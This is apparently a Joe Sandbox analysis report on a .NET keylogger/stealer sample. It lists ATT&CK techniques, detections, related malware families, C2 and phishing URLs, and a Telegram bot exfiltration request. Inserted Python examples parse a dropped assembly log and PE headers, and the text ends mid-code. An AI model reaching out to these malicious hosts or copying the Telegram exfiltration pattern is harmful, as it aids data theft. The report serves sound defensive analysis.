                    Source: Yara match | File source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR
                    MITRE ATT&CK Matrix (techniques observed in this analysis carry their indicator count in brackets; the remaining cells are the unobserved techniques of the standard matrix)

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts [1] | Native API [1] | DLL Side-Loading [1] | DLL Side-Loading [1] | Disable or Modify Tools [1] | OS Credential Dumping [1] | System Information Discovery [13] | Remote Services | Archive Collected Data [11] | Web Service [1] | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job [1] | Valid Accounts [1] | Valid Accounts [1] | Deobfuscate/Decode Files or Information [1] | Input Capture [1] | Security Software Discovery [111] | Remote Desktop Protocol | Data from Local System [1] | Ingress Tool Transfer [3] | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Scheduled Task/Job [1] | Access Token Manipulation [1] | Obfuscated Files or Information [3] | Security Account Manager | Process Discovery [1] | SMB/Windows Admin Shares | Screen Capture [1] | Encrypted Channel [11] | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Process Injection [311] | Software Packing [11] | NTDS | Virtualization/Sandbox Evasion [141] | Distributed Component Object Model | Email Collection [1] | Non-Application Layer Protocol [3] | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Scheduled Task/Job [1] | DLL Side-Loading [1] | LSA Secrets | Application Window Discovery [1] | SSH | Input Capture [1] | Application Layer Protocol [14] | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading [1] | Cached Domain Credentials | System Network Configuration Discovery [1] | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Valid Accounts [1] | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation [1] | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Virtualization/Sandbox Evasion [141] | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection [311] | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                    Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Hidden Files and Directories [1] | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Source            Detection   Scanner          Label
pbCN4g6sN5.exe    71%         ReversingLabs    Win32.Trojan.Leonem
pbCN4g6sN5.exe    100%        Avira            HEUR/AGEN.1306802
pbCN4g6sN5.exe    100%        Joe Sandbox ML

No Antivirus matches
No Antivirus matches
No Antivirus matches

Source                                                                    Detection   Scanner            Label
http://varders.kozow.com:8081                                             100%        Avira URL Cloud    malware
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded   0%          Avira URL Cloud    safe
http://anotherarmy.dns.army:8081                                          100%        Avira URL Cloud    phishing
http://aborters.duckdns.org:8081                                          100%        Avira URL Cloud    phishing
Name                  IP                 Active    Malicious   Antivirus Detection   Reputation
reallyfreegeoip.org   188.114.97.3       true      false       -                     high
api.telegram.org      149.154.167.220    true      false       -                     high
checkip.dyndns.com    132.226.8.169      true      false       -                     high
checkip.dyndns.org    unknown            unknown   false       -                     high

Name                                             Malicious   Antivirus Detection   Reputation
https://reallyfreegeoip.org/xml/8.46.123.189     false       -                     high
http://checkip.dyndns.org/                       false       -                     high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:36:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
                                                 false       -                     high
IP                 Domain                Country          ASN     ASN Name          Malicious
132.226.8.169      checkip.dyndns.com    United States    16989   UTMEMUS           false
149.154.167.220    api.telegram.org      United Kingdom   62041   TELEGRAMRU        false
188.114.97.3       reallyfreegeoip.org   European Union   13335   CLOUDFLARENETUS   false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1586029
Start date and time: 2025-01-08 16:31:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: pbCN4g6sN5.exe (renamed because the original name is a hash value)
Original Sample Name: 0d6d13b615ce21e4a4ff75ec6ad0047a5664aafc05745188afc2e4497c2bed9f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@3/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 158
                                                                                                                                          • Number of non-executed functions: 30
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 23.56.254.164, 4.175.87.197, 13.107.246.45
                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target InstallUtil.exe, PID 7492 because it is empty
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                          • VT rate limit hit for: pbCN4g6sN5.exe
Time | Type | Description
10:32:03 | API Interceptor | 122789x Sleep call for process: pbCN4g6sN5.exe modified
10:33:08 | API Interceptor | 2709x Sleep call for process: InstallUtil.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
132.226.8.169 | HVSU7GbA5N.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
 | ENQ-0092025.doc | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
 | document pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
 | ITT # KRPBV2663 .doc | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
 | kP8EgMorTr.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
 | PO_B2W984.com | Get hash | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | Browse | checkip.dyndns.org/
 | PO_2024_056209_MQ04865_ENQ_1045.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | checkip.dyndns.org/
 | Azygoses125.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
 | PARATRANSFARI REMINDER.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
 | F.O Pump Istek,Docx.bat | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | checkip.dyndns.org/
149.154.167.220 | HVSU7GbA5N.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
 | oagkiAhXgZ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
 | proforma invoice pdf.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
 | spreadmalware.exe | Get hash | malicious | XWorm | Browse |
 | random.exe | Get hash | malicious | CStealer | Browse |
 | random.exe | Get hash | malicious | CStealer | Browse |
 | HaLCYOFjMN.exe | Get hash | malicious | DCRat, PureLog Stealer, RedLine, XWorm, zgRAT | Browse |
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc | Browse |
 | ENQ-0092025.doc | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
 | Resource.exe | Get hash | malicious | Blank Grabber | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reallyfreegeoip.org | HVSU7GbA5N.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
 | oagkiAhXgZ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
 | VSLS SCHEDULE_pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.96.3
 | ungziped_file.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
 | fatura098002.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.97.3
 | Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.97.3
 | New order 2025.msg | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 188.114.97.3
 | ENQ-0092025.doc | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
 | MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.97.3
 | FORTUNE RICH_PARTICULARS.pdf.scr.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.97.3
api.telegram.org | HVSU7GbA5N.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
 | oagkiAhXgZ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | proforma invoice pdf.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 149.154.167.220
 | spreadmalware.exe | Get hash | malicious | XWorm | Browse | 149.154.167.220
 | random.exe | Get hash | malicious | CStealer | Browse | 149.154.167.220
 | random.exe | Get hash | malicious | CStealer | Browse | 149.154.167.220
 | HaLCYOFjMN.exe | Get hash | malicious | DCRat, PureLog Stealer, RedLine, XWorm, zgRAT | Browse | 149.154.167.220
 | ENQ-0092025.doc | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | Resource.exe | Get hash | malicious | Blank Grabber | Browse | 149.154.167.220
 | user.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
checkip.dyndns.com | HVSU7GbA5N.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.8.169
 | oagkiAhXgZ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73
 | VSLS SCHEDULE_pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.130.0
 | ungziped_file.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.130.0
 | fatura098002.exe | Get hash | malicious | MassLogger RAT | Browse | 132.226.247.73
 | Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe | Get hash | malicious | MassLogger RAT | Browse | 132.226.247.73
 | New order 2025.msg | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 193.122.6.168
 | ENQ-0092025.doc | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
 | MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe | Get hash | malicious | MassLogger RAT | Browse | 132.226.247.73
 | FORTUNE RICH_PARTICULARS.pdf.scr.exe | Get hash | malicious | MassLogger RAT | Browse | 158.101.44.242
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              TELEGRAMRUHVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              http://t.me/hhackplusGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.99
                                                                                                                                                              CLOUDFLARENETUSHVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 188.114.96.3
                                                                                                                                                              https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.18.95.41
                                                                                                                                                              https://u18282959.ct.sendgrid.net/ls/click?upn=u001.rEMfFlpAoJgeimh0eSdetqZJOaDEFgZEM86yJv-2FFqn4BDVcYSBJ7qe3MiIpMf7EHr39f_olH575WPuDKQ6-2BlwfkTb3bEPQyZlspfhjzLUkESeUKdz-2BSLVmhS-2BiNhtE4sjBDlEtszfbsE5c6igxavK3muY3tYeP6QkmX-2BJi-2BaLU6j8Wsp6hQUS9QOYhOuxeiGpmu9xPXTXniG-2FhK47xPzbY2a7dAVr4WH1EaPd9qfgngR-2BS0-2BE0l9vGYKsxljCm-2F3LXvjLQIge-2FSmK3YEyKDG8HCxUjDZIuKEbjKZRrfVUUqiw37aYZrphVQ5WvB0QOlR-2Be2shKtaVihd3RfTtBEd0NyHk9A-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.18.86.42
XL-1-6-25-(EXCEL LATEST 2025).html | malicious | HTMLPhisher | 104.17.25.14
oagkiAhXgZ.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
http://vwi46h7.terraclicks.click/rd/4fRUWo26099tRCA461sdwbdplppv232VXGPAFVAHBPJXIV321477KIEL571756p9 | malicious | Phisher | 188.114.96.3
http://wfs.SATSGroup.co/login.php?id=bmZlcmRpbmFuZG9Ad2ZzLmFlcm8= | malicious | Unknown | 104.17.25.14
https://url.uk.m.mimecastprotect.com/s/jiGQCnr5DH7GvmPu9fVSJcV9l?domain=wfs.satsgroup.co | malicious | Unknown | 104.17.25.14
VSLS SCHEDULE_pdf.exe | malicious | MassLogger RAT | 188.114.96.3
Match: UTMEMUS
HVSU7GbA5N.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169
oagkiAhXgZ.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
fatura098002.exe | malicious | MassLogger RAT | 132.226.247.73
Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe | malicious | MassLogger RAT | 132.226.247.73
miori.ppc.elf | malicious | Unknown | 132.224.247.83
ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.8.169
MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe | malicious | MassLogger RAT | 132.226.247.73
document pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.247.73
ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.8.169
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
HVSU7GbA5N.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
oagkiAhXgZ.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
VSLS SCHEDULE_pdf.exe | malicious | MassLogger RAT | 188.114.97.3
ungziped_file.exe | malicious | Snake Keylogger | 188.114.97.3
fatura098002.exe | malicious | MassLogger RAT | 188.114.97.3
Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe | malicious | MassLogger RAT | 188.114.97.3
New order 2025.msg | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe | malicious | MassLogger RAT | 188.114.97.3
FORTUNE RICH_PARTICULARS.pdf.scr.exe | malicious | MassLogger RAT | 188.114.97.3
Match: 3b5074b1b5d032e5620f69f9f700ff0e
HVSU7GbA5N.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
oagkiAhXgZ.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
z.bat | malicious | Abobus Obfuscator, Braodo | 149.154.167.220
h.bat | malicious | Abobus Obfuscator, Braodo | 149.154.167.220
web55.mp4.hta | malicious | LummaC | 149.154.167.220
atomxml.ps1 | malicious | PureLog Stealer, RHADAMANTHYS, zgRAT | 149.154.167.220
QUOTATION - RFQ2496_PO 08775622879.pdf(87kb).com.exe | malicious | Quasar | 149.154.167.220
proforma invoice pdf.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
174.exe | malicious | Xmrig | 149.154.167.220
spreadmalware.exe | malicious | XWorm | 149.154.167.220
                                                                                                                                                              No context
                                                                                                                                                              Process:C:\Users\user\Desktop\pbCN4g6sN5.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1216
                                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
                                                                                                                                                              MD5:7B709BC412BEC5C3CFD861C041DAD408
                                                                                                                                                              SHA1:532EA6BB3018AE3B51E7A5788F614A6C49252BCF
                                                                                                                                                              SHA-256:733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
                                                                                                                                                              SHA-512:B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
                                                                                                                                                              Malicious:true
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
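The dropped text file previewed above has the layout of a CLR assembly usage log: one comma-separated record per CRLF line, quoted .NET assembly display names (which themselves contain commas, so a naive split breaks), and for some records the path of the native (NGEN) image that was used. It is written by the .NET runtime inside the sample's process, so it is a durable record of which framework assemblies the process actually pulled in, which is worth setting beside the report's screen-capture and keylogging signatures. The Python below is an added example, not code from the report or from Joe Sandbox: it parses the records visible in the preview (reconstructed inline with CRLF terminators, the cut-off last record kept cut off on purpose) and relates the loaded assemblies to the behaviours the report lists. The meaning given to the leading record type and the triage notes in ASSEMBLIES_OF_INTEREST are my assumptions, not something the report states.

```python
import csv
from typing import Dict, List, NamedTuple, Optional

# Constructed input: the records visible in the report's "Preview" of the
# dropped 1216-byte file, with the ".." the report prints for non-printable
# bytes restored to the CRLF terminators its "File Type" line names. The
# preview's truncated last record is deliberately left truncated.
SAMPLE_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\920e3d1d70447c3c10e69e6df0766568\\System.ni.dll",0\r\n'
    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
    '2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\8b2c1203fd20aea8260bfbc518004720\\System.Core.ni.dll",0\r\n'
    '3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\2192b0d5aa4aa14486ae08118d3b9fcc\\System.Configuration.ni.dll",0\r\n'
    '3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a'
)


class AssemblyLoad(NamedTuple):
    name: str                    # short name, e.g. "System.Drawing"
    display_name: str            # full display name with version and token
    native_image: Optional[str]  # NGEN image path when the record names one


def short_name(display_name: str) -> str:
    return display_name.split(",", 1)[0].strip()


def parse_usage_log(text: str) -> List[AssemblyLoad]:
    """Assumed record layout (my reading of the format, not stated by the
    report): the first field is a record type, 1 = binder settings, 2 = assembly
    loaded from its IL image, 3 = assembly loaded through the native image
    named in the third field. Every complete record ends in a numeric flag."""
    loads: List[AssemblyLoad] = []
    for line in text.split("\r\n"):
        if not line:
            continue
        try:
            fields = next(csv.reader([line]))  # quoted names contain commas
        except csv.Error:
            continue                           # unterminated quote: cut off
        if len(fields) < 3 or not fields[-1].isdigit():
            continue                           # truncated or unknown record
        rtype, display = fields[0], fields[1]
        if rtype == "2" and len(fields) == 3:
            loads.append(AssemblyLoad(short_name(display), display, None))
        elif rtype == "3" and len(fields) == 4:
            loads.append(AssemblyLoad(short_name(display), display, fields[2]))
    return loads


# Assumed triage mapping (mine): what each framework assembly is commonly used
# for, so the load list can be read against the report's behaviour list.
ASSEMBLIES_OF_INTEREST: Dict[str, str] = {
    "System.Windows.Forms": "Screen/Control/Clipboard APIs used by .NET screen-capture and keylogging code",
    "System.Drawing": "Bitmap and Graphics.CopyFromScreen, the usual .NET screen-capture primitive",
    "Microsoft.VisualBasic": "VB runtime helpers (Interaction, Strings): VB.NET-compiled code or use of those helpers",
    "System.Configuration": "application settings (app.config) access",
}


def triage(loads: List[AssemblyLoad]) -> Dict[str, str]:
    return {a.name: ASSEMBLIES_OF_INTEREST[a.name]
            for a in loads if a.name in ASSEMBLIES_OF_INTEREST}


if __name__ == "__main__":
    loads = parse_usage_log(SAMPLE_LOG)
    for a in loads:
        kind = "native image" if a.native_image else "IL"
        print(f"{a.name:<24} {kind:<13} {a.display_name}")
    for name, why in triage(loads).items():
        print(f"  {name}: {why}")
```

The parser deliberately skips the truncated System.Xml record instead of guessing at it; on a real disk copy of the log that record would be complete. A record of type 3 tells you a native image existed and was used, which also means the assembly came from the GAC rather than from the sample's own directory.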
                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Entropy (8bit):6.997924935682203
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                              File name:pbCN4g6sN5.exe
                                                                                                                                                              File size:816'128 bytes
                                                                                                                                                              MD5:7d88e5bad194e89ada135543169da996
                                                                                                                                                              SHA1:929a742475ae4b93a5e164b1d565d7d7f78f6b62
                                                                                                                                                              SHA256:0d6d13b615ce21e4a4ff75ec6ad0047a5664aafc05745188afc2e4497c2bed9f
                                                                                                                                                              SHA512:8906f861bc6049f059757a24d326b21ea626d4b890791c1e10f101a8f387ae24febcc5501440ea45d07675c775286664dcd75d4f61a2929939cc87169ae0aede
                                                                                                                                                              SSDEEP:12288:zibdSKErr8jptCVn7B/7jJIk9dB6g5MCao3AiqLwgDn7PK:VqpgVt/7mk9dBKo3A9LD7PK
                                                                                                                                                              TLSH:3005E0007385ED7AF8B804368774C7F751ACEE0294AB169F496E3A47BC7C22639F2495
                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g.t9.................4...>......^R... ...`....@.. ....................................`................................
                                                                                                                                                              Icon Hash:74f0d4d4d4d4d4cc
                                                                                                                                                              Entrypoint:0x4b525e
                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                              Digitally signed:false
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                              Time Stamp:0x3974DE67 [Tue Jul 18 22:47:03 2000 UTC]
                                                                                                                                                              TLS Callbacks:
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:4
                                                                                                                                                              OS Version Minor:0
                                                                                                                                                              File Version Major:4
                                                                                                                                                              File Version Minor:0
                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
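The static fields above, together with the entry-point disassembly that follows, are what a compiler-emitted .NET PE32 looks like on disk: a 6-byte native entry stub that jumps through the import address table slot at 0x402000 (the only import, mscoree!_CorExeMain), an Import Hash that is therefore identical for every .NET executable and useless for clustering, and a link timestamp of July 2000 that cannot be a real build date for a .NET 4.0 image (the dropped usage log above shows the 4.0.30319 runtime). The Python below is an added example, not code from the report or from Joe Sandbox. It constructs a header-only PE32 from the values the report lists (the sample's bytes are not on the page), parses it back, verifies the entry stub targets the IAT and that a CLR header exists, converts and sanity-checks the timestamp, decodes the DLL characteristics, and reproduces the Import Hash with the pefile algorithm. Assumptions: the single-section layout of the constructed image, the CLR header at RVA 0x2008, and the .NET Framework 4.0 release date (12 April 2010) used as the earliest plausible link time.

```python
import hashlib
import struct
from datetime import datetime, timezone

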